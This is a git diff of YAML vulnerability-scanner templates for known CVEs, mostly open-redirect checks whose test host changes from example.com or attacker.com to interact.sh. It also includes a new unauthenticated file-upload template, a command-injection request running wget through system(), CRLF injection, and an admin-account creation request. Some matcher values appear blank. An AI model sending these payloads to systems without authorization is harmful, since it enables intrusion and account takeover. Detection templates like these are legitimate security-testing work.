'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-16761.yaml b/cves/2018/CVE-2018-16761.yaml new file mode 100644 index 0000000000..ec40ee117f --- /dev/null +++ b/cves/2018/CVE-2018-16761.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-16761 + +info: + name: Eventum v3.3.4 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + Eventum before 3.4.0 has an open redirect vulnerability. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ + - https://github.com/eventum/eventum/ + - https://www.cvedetails.com/cve/CVE-2018-16761/ + - https://github.com/eventum/eventum/releases/tag/v3.4.0 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-16761 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,eventum,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/select_project.php?url=http://interact.sh' + - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh' + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml index e9c70f056b..02d8bd123f 100644 --- a/cves/2018/CVE-2018-17422.yaml +++ b/cves/2018/CVE-2018-17422.yaml @@ -22,8 +22,8 @@ info: requests: - method: GET path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' stop-at-first-match: true matchers-condition: and @@ -32,7 +32,7 @@ requests: - type: word part: body words: - - "self.location = 'http://www.example.com'" + - "self.location = 'http://www.interact.sh'" - type: status status: diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml index ce3dce57f2..b4df959f48 100644 --- a/cves/2018/CVE-2018-3167.yaml +++ b/cves/2018/CVE-2018-3167.yaml @@ -20,7 +20,7 @@ requests: path: - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp' - body: + body: matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-6200.yaml b/cves/2018/CVE-2018-6200.yaml index 87bd8ef42a..3ef39cbffe 100644 --- a/cves/2018/CVE-2018-6200.yaml +++ b/cves/2018/CVE-2018-6200.yaml @@ -21,8 +21,8 @@ info: requests: - method: GET path: - - '{{BaseURL}}/redirector.php?url=https://attacker.com' - - '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com' + - '{{BaseURL}}/redirector.php?url=https://interact.sh' + - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' matchers-condition: and matchers: @@ -30,7 +30,7 @@ requests: - type: word part: body words: - - '' + - '' - type: status status: diff --git a/cves/2019/CVE-2019-1010290.yaml b/cves/2019/CVE-2019-1010290.yaml index 24fe7c97df..36da70ab7c 100644 --- a/cves/2019/CVE-2019-1010290.yaml +++ b/cves/2019/CVE-2019-1010290.yaml @@ -19,10 +19,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com' + - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index b2780cf573..52999cd8cd 100644 --- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -25,10 +25,10 @@ requests: Content-Type: application/x-www-form-urlencoded body: | - success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass + success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass matchers: - type: regex part: header regex: - - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$" \ No newline at end of file + - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$" \ No newline at end of file diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml index fce4ffdd64..ed12c1a447 100644 --- a/cves/2019/CVE-2019-16097.yaml +++ b/cves/2019/CVE-2019-16097.yaml @@ -25,7 +25,7 @@ requests: headers: Content-Type: application/json body: | - {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} + {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"} matchers-condition: and matchers: diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index b827b04270..48ffb51ea7 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com' + - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2019/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml index 26ef262b5d..c865445f3f 100644 --- a/cves/2019/CVE-2019-7275.yaml +++ b/cves/2019/CVE-2019-7275.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/updating.jsp?url=https://example.com/" + - "{{BaseURL}}/updating.jsp?url=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index ea6ce7dd2f..fa1e54195e 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -21,13 +21,13 @@ requests: - method: GET path: - - '{{BaseURL}}/index.php?redirect=/\/evil.com/' - - '{{BaseURL}}/index.php?redirect=//evil.com' + - '{{BaseURL}}/index.php?redirect=/\/interact.sh/' + - '{{BaseURL}}/index.php?redirect=//interact.sh' matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' part: header # Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml index 02c6e86d2e..9d9059661f 100644 --- a/cves/2020/CVE-2020-11529.yaml +++ b/cves/2020/CVE-2020-11529.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/' + - '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/' matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' part: header # Enhanced by mp on 2022/05/04 diff --git a/cves/2020/CVE-2020-13945.yaml b/cves/2020/CVE-2020-13945.yaml index 3247e37750..6c740884d6 100644 --- a/cves/2020/CVE-2020-13945.yaml +++ b/cves/2020/CVE-2020-13945.yaml @@ -30,7 +30,7 @@ requests: "upstream":{ "type":"roundrobin", "nodes":{ - "example.com:80":1 + "interact.sh:80":1 } } } diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml index ed603d9e0d..30e754c8d8 100644 --- a/cves/2020/CVE-2020-18268.yaml +++ b/cves/2020/CVE-2020-18268.yaml @@ -28,7 +28,7 @@ requests: btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 - | - GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 + GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 Host: {{Hostname}} cookie-reuse: true @@ -36,4 +36,4 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index a642e28b21..2f482a573b 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml @@ -19,10 +19,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" + - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' part: header diff --git a/cves/2020/CVE-2020-23015.yaml b/cves/2020/CVE-2020-23015.yaml index 97f4de8c09..a718da52a7 100644 --- a/cves/2020/CVE-2020-23015.yaml +++ b/cves/2020/CVE-2020-23015.yaml @@ -19,10 +19,10 @@ requests: - method: GET path: - - '{{BaseURL}}/?url=http://example.com' + - '{{BaseURL}}/?url=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' \ No newline at end of file diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index b7eecbd3ea..344189257f 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -17,14 +17,14 @@ info: requests: - method: GET path: - - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com' + - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh' matchers-condition: and matchers: - type: word part: header words: - - "Location: https://example.com" + - "Location: https://interact.sh" - type: status status: diff --git a/cves/2020/CVE-2020-29597.yaml b/cves/2020/CVE-2020-29597.yaml new file mode 100644 index 0000000000..8be881cf8c --- /dev/null +++ b/cves/2020/CVE-2020-29597.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-29597 +info: + name: IncomCMS 2.0 - Arbitary files upload + author: princechaddha + severity: critical + description: | + IncomCMS 2.0 has a modules/uploader/showcase/script.php insecure file upload vulnerability. This vulnerability allows unauthenticated attackers to upload files into the server. + reference: + - https://github.com/Trhackno/CVE-2020-29597 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 + - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md + - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-29597 + cwe-id: CWE-434 + metadata: + verified: "true" + tags: cve,cve2020,incomcms,fileupload,intrusive + +requests: + - raw: + - | + POST /incom/modules/uploader/showcase/script.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt + + ------WebKitFormBoundaryBEJZt0IK73M2mAbt + Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png" + Content-Type: image/png + + + ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- + - | + GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - contains(body_1, '\"name\":\"{{randstr}}.png\"') + - status_code_2 == 200 + condition: and diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 89376f3904..88c9505ec1 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -18,7 +18,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" + - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" matchers-condition: and matchers: - type: status diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml index 7780f22248..1d16630c70 100644 --- a/cves/2020/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml @@ -22,10 +22,10 @@ requests: - method: GET path: - - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index e922f67ada..03407b6981 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20090 info: name: Buffalo WSR-2533DHPL2 - Path Traversal author: gy741 - severity: high + severity: critical description: | Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. reference: @@ -11,8 +11,8 @@ info: - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-20090 cwe-id: CWE-22 tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa diff --git a/cves/2021/CVE-2021-21311.yaml b/cves/2021/CVE-2021-21311.yaml index 70383a0a9d..afdd2b40ee 100644 --- a/cves/2021/CVE-2021-21311.yaml +++ b/cves/2021/CVE-2021-21311.yaml @@ -21,7 +21,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/adminer?elastic=example.com&username=" + - "{{BaseURL}}/adminer?elastic=interact.sh&username=" matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index 03a4cdb928..da5eb9ac90 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -28,7 +28,7 @@ requests: "user_login":"{{randstr}}", "password":"{{randstr}}", "user_name":"{{randstr}}", - "user_email":"{{randstr}}@example.com" + "user_email":"{{randstr}}@interact.sh" } matchers-condition: and diff --git a/cves/2021/CVE-2021-21745.yaml b/cves/2021/CVE-2021-21745.yaml index 65de258715..867df640ad 100644 --- a/cves/2021/CVE-2021-21745.yaml +++ b/cves/2021/CVE-2021-21745.yaml @@ -23,7 +23,7 @@ requests: - | GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 Host: {{Hostname}} - Referer: http://evil.com/127.0.0.1.html + Referer: http://interact.sh/127.0.0.1.html matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-22054.yaml b/cves/2021/CVE-2021-22054.yaml index a2e515f8d3..03ec978fa0 100644 --- a/cves/2021/CVE-2021-22054.yaml +++ b/cves/2021/CVE-2021-22054.yaml @@ -31,4 +31,4 @@ requests: - type: word words: - - "Example Domain" + - "

Interactsh Server

" diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index fa16b73f67..afd1efd5cb 100644 --- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com" - - "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com" + - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh" + - "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh" stop-at-first-match: true redirects: true @@ -37,5 +37,5 @@ requests: - 200 - type: word words: - - "Example Domain" + - "

Interactsh Server

" part: body diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index e40368cb13..31f45a6ce6 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -22,10 +22,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com" + - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml index 03abba0392..353e46f133 100644 --- a/cves/2021/CVE-2021-24288.yaml +++ b/cves/2021/CVE-2021-24288.yaml @@ -18,10 +18,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" + - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2021/CVE-2021-24358.yaml b/cves/2021/CVE-2021-24358.yaml index b495d73948..b14b8c85ef 100644 --- a/cves/2021/CVE-2021-24358.yaml +++ b/cves/2021/CVE-2021-24358.yaml @@ -23,7 +23,7 @@ requests: Host: {{Hostname}} - | - GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1 + GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1 Host: {{Hostname}} redirects: true @@ -31,7 +31,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 extractors: - type: regex diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml index 3eab806058..e9962f0eb1 100644 --- a/cves/2021/CVE-2021-24406.yaml +++ b/cves/2021/CVE-2021-24406.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/" + - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-24838.yaml b/cves/2021/CVE-2021-24838.yaml index 4507004f34..d5a8994f81 100644 --- a/cves/2021/CVE-2021-24838.yaml +++ b/cves/2021/CVE-2021-24838.yaml @@ -19,14 +19,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" + - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh" matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: diff --git a/cves/2021/CVE-2021-25028.yaml b/cves/2021/CVE-2021-25028.yaml index 95166d2193..276b76a71b 100644 --- a/cves/2021/CVE-2021-25028.yaml +++ b/cves/2021/CVE-2021-25028.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com" + - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-25033.yaml b/cves/2021/CVE-2021-25033.yaml index eb2253c0ed..83c815b2b8 100644 --- a/cves/2021/CVE-2021-25033.yaml +++ b/cves/2021/CVE-2021-25033.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com" + - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-25074.yaml b/cves/2021/CVE-2021-25074.yaml index 4d0bc14d27..3ae03aa67d 100644 --- a/cves/2021/CVE-2021-25074.yaml +++ b/cves/2021/CVE-2021-25074.yaml @@ -18,12 +18,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com" + - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/21 diff --git a/cves/2021/CVE-2021-25111.yaml b/cves/2021/CVE-2021-25111.yaml index 7c8f439e97..506e3d7994 100644 --- a/cves/2021/CVE-2021-25111.yaml +++ b/cves/2021/CVE-2021-25111.yaml @@ -17,10 +17,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com" + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 7f46e618ad..639239fcce 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -19,7 +19,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" + - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0" matchers-condition: and matchers: @@ -32,7 +32,7 @@ requests: 